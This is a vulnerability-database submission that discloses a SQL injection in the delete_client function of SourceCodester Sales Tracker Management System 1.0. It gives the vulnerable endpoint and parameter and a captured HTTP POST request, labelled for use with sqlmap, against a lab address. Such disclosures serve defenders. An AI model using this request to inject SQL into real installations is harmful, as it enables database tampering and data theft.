| タイトル | Sales Tracker Management System sql injection |
|---|
| 説明 | A vulnerability classified as critical has been found in SourceCodester Sales Tracker Management System 1.0. Affected is an delete_client function of the file classes/Master.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely.
The delete_client function received the parameter and there is no filtering operation for parameters. Directly compose sql statements for database operation. This causes sql injection.
sourcecode download url: https://www.sourcecodester.com/php/16061/sales-tracker-management-system-using-php-free-source-code.html
sqlmap data packet:
POST /php-sts/classes/Master.php?f=delete_client HTTP/1.1
Host: 192.168.131.135
Content-Length: 4
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.131.135
Referer: http://192.168.131.135/php-sts/admin/?page=clients
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=jdrpmrsek6p8ng9fmdh68bqmo0; deviceid=1678156846944; xinhu_mo_adminid=fv0eh0ff0li0vf0vh0lf0hhs0if0hhc0hci0hcl0vv0iv0vs0ei012; xinhu_ca_adminuser=admin; xinhu_ca_rempass=0
Connection: close
id=3 |
|---|
| ソース | ⚠️ https://github.com/Mart1nD0t/vul-test/blob/main/sts-3.md |
|---|
| ユーザー | yangxuelin (UID 42489) |
|---|
| 送信 | 2023年03月09日 08:29 (3 年 ago) |
|---|
| モデレーション | 2023年03月09日 15:25 (7 hours later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 222646 [SourceCodester Sales Tracker Management System 1.0 classes/Master.php delete_client 識別子 SQLインジェクション] |
|---|
| ポイント | 20 |
|---|